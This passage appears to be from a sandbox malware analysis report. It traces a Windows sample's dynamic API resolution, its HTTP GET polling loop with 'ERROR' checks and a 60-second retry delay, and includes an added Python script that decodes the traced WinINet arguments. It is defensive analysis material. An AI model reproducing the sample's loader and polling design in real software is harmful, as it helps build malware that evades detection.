                          control_flow_graph 633 c09c10-c09c1a 634 c09c20-c0a031 GetProcAddress * 43 633->634 635 c0a036-c0a0ca LoadLibraryA * 8 633->635 634->635 636 c0a146-c0a14d 635->636 637 c0a0cc-c0a141 GetProcAddress * 5 635->637 638 c0a153-c0a211 GetProcAddress * 8 636->638 639 c0a216-c0a21d 636->639 637->636 638->639 640 c0a298-c0a29f 639->640 641 c0a21f-c0a293 GetProcAddress * 5 639->641 642 c0a2a5-c0a332 GetProcAddress * 6 640->642 643 c0a337-c0a33e 640->643 641->640 642->643 644 c0a344-c0a41a GetProcAddress * 9 643->644 645 c0a41f-c0a426 643->645 644->645 646 c0a4a2-c0a4a9 645->646 647 c0a428-c0a49d GetProcAddress * 5 645->647 648 c0a4ab-c0a4d7 GetProcAddress * 2 646->648 649 c0a4dc-c0a4e3 646->649 647->646 648->649 650 c0a515-c0a51c 649->650 651 c0a4e5-c0a510 GetProcAddress * 2 649->651 652 c0a612-c0a619 650->652 653 c0a522-c0a60d GetProcAddress * 10 650->653 651->650 654 c0a61b-c0a678 GetProcAddress * 4 652->654 655 c0a67d-c0a684 652->655 653->652 654->655 656 c0a686-c0a699 GetProcAddress 655->656 657 c0a69e-c0a6a5 655->657 656->657 658 c0a6a7-c0a703 GetProcAddress * 4 657->658 659 c0a708-c0a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(75900000,006D6940), ref: 00C09C2D
                          • GetProcAddress.KERNEL32(75900000,006D6800), ref: 00C09C45
                          • GetProcAddress.KERNEL32(75900000,006E8D00), ref: 00C09C5E
                          • GetProcAddress.KERNEL32(75900000,006E8C88), ref: 00C09C76
                          • GetProcAddress.KERNEL32(75900000,006EC8E8), ref: 00C09C8E
                          • GetProcAddress.KERNEL32(75900000,006EC8B8), ref: 00C09CA7
                          • GetProcAddress.KERNEL32(75900000,006DB298), ref: 00C09CBF
                          • GetProcAddress.KERNEL32(75900000,006EC918), ref: 00C09CD7
                          • GetProcAddress.KERNEL32(75900000,006EC990), ref: 00C09CF0
                          • GetProcAddress.KERNEL32(75900000,006EC840), ref: 00C09D08
                          • GetProcAddress.KERNEL32(75900000,006EC8A0), ref: 00C09D20
                          • GetProcAddress.KERNEL32(75900000,006D6820), ref: 00C09D39
                          • GetProcAddress.KERNEL32(75900000,006D6980), ref: 00C09D51
                          • GetProcAddress.KERNEL32(75900000,006D69A0), ref: 00C09D69
                          • GetProcAddress.KERNEL32(75900000,006D6860), ref: 00C09D82
                          • GetProcAddress.KERNEL32(75900000,006EC810), ref: 00C09D9A
                          • GetProcAddress.KERNEL32(75900000,006EC828), ref: 00C09DB2
                          • GetProcAddress.KERNEL32(75900000,006DB2C0), ref: 00C09DCB
                          • GetProcAddress.KERNEL32(75900000,006D6880), ref: 00C09DE3
                          • GetProcAddress.KERNEL32(75900000,006EC858), ref: 00C09DFB
                          • GetProcAddress.KERNEL32(75900000,006EC9D8), ref: 00C09E14
                          • GetProcAddress.KERNEL32(75900000,006EC8D0), ref: 00C09E2C
                          • GetProcAddress.KERNEL32(75900000,006ECAE0), ref: 00C09E44
                          • GetProcAddress.KERNEL32(75900000,006D68A0), ref: 00C09E5D
                          • GetProcAddress.KERNEL32(75900000,006ECA80), ref: 00C09E75
                          • GetProcAddress.KERNEL32(75900000,006EC9C0), ref: 00C09E8D
                          • GetProcAddress.KERNEL32(75900000,006ECA98), ref: 00C09EA6
                          • GetProcAddress.KERNEL32(75900000,006ECAC8), ref: 00C09EBE
                          • GetProcAddress.KERNEL32(75900000,006EC870), ref: 00C09ED6
                          • GetProcAddress.KERNEL32(75900000,006ECAF8), ref: 00C09EEF
                          • GetProcAddress.KERNEL32(75900000,006EC900), ref: 00C09F07
                          • GetProcAddress.KERNEL32(75900000,006EC888), ref: 00C09F1F
                          • GetProcAddress.KERNEL32(75900000,006EC930), ref: 00C09F38
                          • GetProcAddress.KERNEL32(75900000,006E9ED8), ref: 00C09F50
                          • GetProcAddress.KERNEL32(75900000,006EC948), ref: 00C09F68
                          • GetProcAddress.KERNEL32(75900000,006EC960), ref: 00C09F81
                          • GetProcAddress.KERNEL32(75900000,006D68E0), ref: 00C09F99
                          • GetProcAddress.KERNEL32(75900000,006EC978), ref: 00C09FB1
                          • GetProcAddress.KERNEL32(75900000,006D6900), ref: 00C09FCA
                          • GetProcAddress.KERNEL32(75900000,006EC9F0), ref: 00C09FE2
                          • GetProcAddress.KERNEL32(75900000,006EC9A8), ref: 00C09FFA
                          • GetProcAddress.KERNEL32(75900000,006D6480), ref: 00C0A013
                          • GetProcAddress.KERNEL32(75900000,006D6640), ref: 00C0A02B
                          • LoadLibraryA.KERNEL32(006ECA38,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A03D
                          • LoadLibraryA.KERNEL32(006ECA08,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A04E
                          • LoadLibraryA.KERNEL32(006ECA20,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A060
                          • LoadLibraryA.KERNEL32(006ECA50,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A072
                          • LoadLibraryA.KERNEL32(006ECA68,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A083
                          • LoadLibraryA.KERNEL32(006ECAB0,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A095
                          • LoadLibraryA.KERNEL32(006ECC30,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A0A7
                          • LoadLibraryA.KERNEL32(006ECD80,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A0B8
                          • GetProcAddress.KERNEL32(75FD0000,006D64E0), ref: 00C0A0DA
                          • GetProcAddress.KERNEL32(75FD0000,006ECD50), ref: 00C0A0F2
                          • GetProcAddress.KERNEL32(75FD0000,006E8900), ref: 00C0A10A
                          • GetProcAddress.KERNEL32(75FD0000,006ECC60), ref: 00C0A123
                          • GetProcAddress.KERNEL32(75FD0000,006D65C0), ref: 00C0A13B
                          • GetProcAddress.KERNEL32(734B0000,006DAF78), ref: 00C0A160
                          • GetProcAddress.KERNEL32(734B0000,006D6440), ref: 00C0A179
                          • GetProcAddress.KERNEL32(734B0000,006DB108), ref: 00C0A191
                          • GetProcAddress.KERNEL32(734B0000,006ECBB8), ref: 00C0A1A9
                          • GetProcAddress.KERNEL32(734B0000,006ECC78), ref: 00C0A1C2
                          • GetProcAddress.KERNEL32(734B0000,006D6500), ref: 00C0A1DA
                          • GetProcAddress.KERNEL32(734B0000,006D65E0), ref: 00C0A1F2
                          • GetProcAddress.KERNEL32(734B0000,006ECD08), ref: 00C0A20B
                          • GetProcAddress.KERNEL32(763B0000,006D63C0), ref: 00C0A22C
                          • GetProcAddress.KERNEL32(763B0000,006D62A0), ref: 00C0A244
                          • GetProcAddress.KERNEL32(763B0000,006ECD20), ref: 00C0A25D
                          • GetProcAddress.KERNEL32(763B0000,006ECBE8), ref: 00C0A275
                          • GetProcAddress.KERNEL32(763B0000,006D6400), ref: 00C0A28D
                          • GetProcAddress.KERNEL32(750F0000,006DB130), ref: 00C0A2B3
                          • GetProcAddress.KERNEL32(750F0000,006DB158), ref: 00C0A2CB
                          • GetProcAddress.KERNEL32(750F0000,006ECD68), ref: 00C0A2E3
                          • GetProcAddress.KERNEL32(750F0000,006D63E0), ref: 00C0A2FC
                          • GetProcAddress.KERNEL32(750F0000,006D6600), ref: 00C0A314
                          • GetProcAddress.KERNEL32(750F0000,006DAF00), ref: 00C0A32C
                          • GetProcAddress.KERNEL32(75A50000,006ECDC8), ref: 00C0A352
                          • GetProcAddress.KERNEL32(75A50000,006D6360), ref: 00C0A36A
                          • GetProcAddress.KERNEL32(75A50000,006E8890), ref: 00C0A382
                          • GetProcAddress.KERNEL32(75A50000,006ECCD8), ref: 00C0A39B
                          • GetProcAddress.KERNEL32(75A50000,006ECC00), ref: 00C0A3B3
                          • GetProcAddress.KERNEL32(75A50000,006D6660), ref: 00C0A3CB
                          • GetProcAddress.KERNEL32(75A50000,006D62C0), ref: 00C0A3E4
                          • GetProcAddress.KERNEL32(75A50000,006ECB40), ref: 00C0A3FC
                          • GetProcAddress.KERNEL32(75A50000,006ECDE0), ref: 00C0A414
                          • GetProcAddress.KERNEL32(75070000,006D64A0), ref: 00C0A436
                          • GetProcAddress.KERNEL32(75070000,006ECDF8), ref: 00C0A44E
                          • GetProcAddress.KERNEL32(75070000,006ECCC0), ref: 00C0A466
                          • GetProcAddress.KERNEL32(75070000,006ECC18), ref: 00C0A47F
                          • GetProcAddress.KERNEL32(75070000,006ECC90), ref: 00C0A497
                          • GetProcAddress.KERNEL32(74E50000,006D6540), ref: 00C0A4B8
                          • GetProcAddress.KERNEL32(74E50000,006D6280), ref: 00C0A4D1
                          • GetProcAddress.KERNEL32(75320000,006D6520), ref: 00C0A4F2
                          • GetProcAddress.KERNEL32(75320000,006ECC48), ref: 00C0A50A
                          • GetProcAddress.KERNEL32(6F060000,006D6420), ref: 00C0A530
                          • GetProcAddress.KERNEL32(6F060000,006D62E0), ref: 00C0A548
                          • GetProcAddress.KERNEL32(6F060000,006D64C0), ref: 00C0A560
                          • GetProcAddress.KERNEL32(6F060000,006ECCA8), ref: 00C0A579
                          • GetProcAddress.KERNEL32(6F060000,006D6560), ref: 00C0A591
                          • GetProcAddress.KERNEL32(6F060000,006D6620), ref: 00C0A5A9
                          • GetProcAddress.KERNEL32(6F060000,006D6580), ref: 00C0A5C2
                          • GetProcAddress.KERNEL32(6F060000,006D65A0), ref: 00C0A5DA
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00C0A5F1
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00C0A607
                          • GetProcAddress.KERNEL32(74E00000,006ECCF0), ref: 00C0A629
                          • GetProcAddress.KERNEL32(74E00000,006E89A0), ref: 00C0A641
                          • GetProcAddress.KERNEL32(74E00000,006ECD38), ref: 00C0A659
                          • GetProcAddress.KERNEL32(74E00000,006ECB70), ref: 00C0A672
                          • GetProcAddress.KERNEL32(74DF0000,006D6320), ref: 00C0A693
                          • GetProcAddress.KERNEL32(6F9C0000,006ECD98), ref: 00C0A6B4
                          • GetProcAddress.KERNEL32(6F9C0000,006D6300), ref: 00C0A6CD
                          • GetProcAddress.KERNEL32(6F9C0000,006ECB58), ref: 00C0A6E5
                          • GetProcAddress.KERNEL32(6F9C0000,006ECDB0), ref: 00C0A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: cm$ dm$ em$ fm$ hm$@dm$@em$@fm$@im$HttpQueryInfoA$InternetSetOptionA$`cm$`em$`fm$`hm$bm$cm$dm$em$hm
                          • API String ID: 2238633743-1644798973
                          • Opcode ID: f6892680b0faf3608246f927f02cca0ccabcc68fdc9d2276547215b6b78d7e60
                          • Instruction ID: 4260de1a7be1a010d2a46f859db0a162d503688ec9eb79447bbc12b3fe82915b
                          • Opcode Fuzzy Hash: f6892680b0faf3608246f927f02cca0ccabcc68fdc9d2276547215b6b78d7e60
                          • Instruction Fuzzy Hash: BD623BB5504208AFC348DFAAED8CD663FF9F79C30171C853AA685E3264D63994C9CB52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 bf6280-bf630b call c0a7a0 call bf47b0 call c0a740 InternetOpenA StrCmpCA 1040 bf630d 1033->1040 1041 bf6314-bf6318 1033->1041 1040->1041 1042 bf631e-bf6342 InternetConnectA 1041->1042 1043 bf6509-bf6525 call c0a7a0 call c0a800 * 2 1041->1043 1045 bf64ff-bf6503 InternetCloseHandle 1042->1045 1046 bf6348-bf634c 1042->1046 1062 bf6528-bf652d 1043->1062 1045->1043 1048 bf634e-bf6358 1046->1048 1049 bf635a 1046->1049 1051 bf6364-bf6392 HttpOpenRequestA 1048->1051 1049->1051 1053 bf6398-bf639c 1051->1053 1054 bf64f5-bf64f9 InternetCloseHandle 1051->1054 1056 bf639e-bf63bf InternetSetOptionA 1053->1056 1057 bf63c5-bf6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1058 bf642c-bf644b call c08940 1057->1058 1059 bf6407-bf6427 call c0a740 call c0a800 * 2 1057->1059 1067 bf644d-bf6454 1058->1067 1068 bf64c9-bf64e9 call c0a740 call c0a800 * 2 1058->1068 1059->1062 1071 bf64c7-bf64ef InternetCloseHandle 1067->1071 1072 bf6456-bf6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 bf648b 1072->1076 1077 bf6482-bf6489 1072->1077 1076->1071 1077->1076 1080 bf648d-bf64c5 call c0a9b0 call c0a8a0 call c0a800 1077->1080 1080->1072
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • InternetOpenA.WININET(00C10DFE,00000001,00000000,00000000,00000000), ref: 00BF62E1
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BF63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BF63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BF63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BF646D
                          • InternetCloseHandle.WININET(00000000), ref: 00BF64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00BF64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00BF6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: c52d1f6800e020add64b2555432b92ef5a8ecc277df77c22ab846aa43d90ae32
                          • Instruction ID: bf0e0217ac6dea45f02c3370fe1f09b48e48fc036e9305b835a3bc95b1b7bcf9
                          • Opcode Fuzzy Hash: c52d1f6800e020add64b2555432b92ef5a8ecc277df77c22ab846aa43d90ae32
                          • Instruction Fuzzy Hash: E0711D71A0021CABDB14EBA5DC49FEE77B8EB44700F1081A9F6096B1D0DBB46A89DF51
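The WinINet sequence listed above (InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, then an InternetReadFile loop) is the sample's HTTP client, and most of what it tells you sits in the numeric arguments, which the report prints as raw hex. The script below is an added example written for this page, not code from Joe Sandbox or from the sample: it parses API lines in the report's `Name.DLL(args), ref: addr` form and annotates the arguments with the Windows SDK constants (wininet.h, winnt.h) they encode. Only the constants needed for the lines on this page are tabled, and the sample lines are copied from the records above. Arguments the report could not resolve are printed as `?`, so the trace establishes that InternetSetOptionA sets INTERNET_OPTION_SECURITY_FLAGS but not which flags, and it does not show the server name or port passed to InternetConnectA.

```python
import re

# Constructed sample input: API lines copied from the records above (the leading
# bullet is optional; the parser accepts lines with or without it).
SAMPLE_TRACE = """\
InternetOpenA.WININET(00C10DFE,00000001,00000000,00000000,00000000), ref: 00BF62E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF6335
HttpOpenRequestA.WININET(00000000,GET,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BF63BF
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BF63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BF646D
Sleep.KERNEL32(0000EA60), ref: 00C05A1B
OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000), ref: 00C06ACA
ExitProcess.KERNEL32 ref: 00C017D1
"""

# Windows SDK constants (wininet.h, winnt.h); only those needed for this page are tabled.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY_LEVELS = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}
ACCESS_MASKS = {0x1F0001: "MUTEX_ALL_ACCESS", 0x1F0003: "EVENT_ALL_ACCESS"}


def decode_flags(value, table):
    """Split a bitmask into named flags, highest bit first; unknown leftover bits stay as hex."""
    names = []
    for bit in sorted(table, reverse=True):
        if value & bit:
            names.append(table[bit])
            value &= ~bit
    if value:
        names.append(f"0x{value:08X}")
    return names


def _lookup(table):
    return lambda v: table.get(v, f"0x{v:X}")


# (API name, zero-based argument index) -> (parameter name, decoder).
DECODERS = {
    ("InternetOpenA", 1): ("dwAccessType", _lookup(OPEN_TYPES)),
    ("InternetConnectA", 5): ("dwService", _lookup(SERVICES)),
    ("HttpOpenRequestA", 6): ("dwFlags", lambda v: "|".join(decode_flags(v, INTERNET_FLAGS)) or "0"),
    ("InternetSetOptionA", 1): ("dwOption", _lookup(OPTIONS)),
    ("HttpQueryInfoA", 1): ("dwInfoLevel", _lookup(QUERY_LEVELS)),
    ("InternetReadFile", 2): ("dwNumberOfBytesToRead", str),
    ("Sleep", 0): ("dwMilliseconds", lambda v: f"{v} ({v / 1000:.1f} s)"),
    ("OpenEventA", 0): ("dwDesiredAccess", lambda v: ACCESS_MASKS.get(v, f"0x{v:08X}")),
}

LINE_RE = re.compile(r"^\s*(?:•\s*)?(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_arg(token):
    """8-hex-digit tokens become ints; '?' (unresolved) and literals such as GET stay text."""
    token = token.strip()
    return int(token, 16) if HEX_RE.match(token) else token


def decode_trace(text):
    """Parse report API lines into dicts with the decoded constants in 'notes'."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        api, dll, raw_args, ref = m.groups()
        args = [parse_arg(t) for t in raw_args.split(",")] if raw_args else []
        notes = []
        for idx, value in enumerate(args):
            if (api, idx) in DECODERS and isinstance(value, int):
                name, fn = DECODERS[(api, idx)]
                notes.append(f"{name}={fn(value)}")
        calls.append({"api": api, "dll": dll, "ref": ref, "args": args, "notes": notes})
    return calls


if __name__ == "__main__":
    for call in decode_trace(SAMPLE_TRACE):
        print(f"{call['ref']} {call['api']:<20} {'; '.join(call['notes'])}")
```

Decoded, the sequence reads: a direct (no proxy) session, INTERNET_SERVICE_HTTP, a GET opened with INTERNET_FLAG_KEEP_CONNECTION and INTERNET_FLAG_PRAGMA_NOCACHE, security flags set on the request handle, the status code queried with HTTP_QUERY_STATUS_CODE, and the body read in 1999-byte (0x7CF) chunks. The last three sample lines come from the other records on this page: the 0xEA60 Sleep is a 60 s delay, 0x1F0003 is EVENT_ALL_ACCESS, and a line without an argument list (ExitProcess) parses with empty args.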

                          Control-flow Graph

                          control_flow_graph 1090 c05510-c05577 call c05ad0 call c0a820 * 3 call c0a740 * 4 1106 c0557c-c05583 1090->1106 1107 c05585-c055b6 call c0a820 call c0a7a0 call bf1590 call c051f0 1106->1107 1108 c055d7-c0564c call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1106->1108 1124 c055bb-c055d2 call c0a8a0 call c0a800 1107->1124 1134 c05693-c056a9 call c0aad0 StrCmpCA 1108->1134 1137 c0564e-c0568e call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1108->1137 1124->1134 1140 c057dc-c05844 call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550 1134->1140 1141 c056af-c056b6 1134->1141 1137->1134 1272 c05ac3-c05ac6 1140->1272 1142 c057da-c0585f call c0aad0 StrCmpCA 1141->1142 1143 c056bc-c056c3 1141->1143 1161 c05991-c059f9 call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550 1142->1161 1162 c05865-c0586c 1142->1162 1146 c056c5-c05719 call c0a820 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1143->1146 1147 c0571e-c05793 call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1143->1147 1146->1142 1147->1142 1250 c05795-c057d5 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1147->1250 1161->1272 1167 c05872-c05879 1162->1167 1168 c0598f-c05a14 call c0aad0 StrCmpCA 1162->1168 1174 c058d3-c05948 call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1167->1174 1175 c0587b-c058ce call c0a820 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1167->1175 1197 c05a16-c05a21 Sleep 1168->1197 1198 c05a28-c05a91 call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550 1168->1198 1174->1168 1276 c0594a-c0598a call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1142 1276->1168
                          APIs
                            • Part of subcall function 00C0A820: lstrlen.KERNEL32(00BF4F05,?,?,00BF4F05,00C10DDE), ref: 00C0A82B
                            • Part of subcall function 00C0A820: lstrcpy.KERNEL32(00C10DDE,00000000), ref: 00C0A885
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C056A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05857
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00C051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05228
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05318
                            • Part of subcall function 00C052C0: lstrlen.KERNEL32(00000000), ref: 00C0532F
                            • Part of subcall function 00C052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C05364
                            • Part of subcall function 00C052C0: lstrlen.KERNEL32(00000000), ref: 00C05383
                            • Part of subcall function 00C052C0: lstrlen.KERNEL32(00000000), ref: 00C053AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C0578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00C05A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: c9b0fff6eb9ef69bf6c79c0f57dd1ad3183270f3436b611a609cf1e2b6ab13ab
                          • Instruction ID: 30f9a9c5b62778365e4299c258f0efd623f54377a6c5542c004d1522c3c22106
                          • Opcode Fuzzy Hash: c9b0fff6eb9ef69bf6c79c0f57dd1ad3183270f3436b611a609cf1e2b6ab13ab
                          • Instruction Fuzzy Hash: 75E15171910208ABCB14FBA5DC56EFE7778AF54300F50C668B506660D1EF346B4DEBA2

                          Control-flow Graph

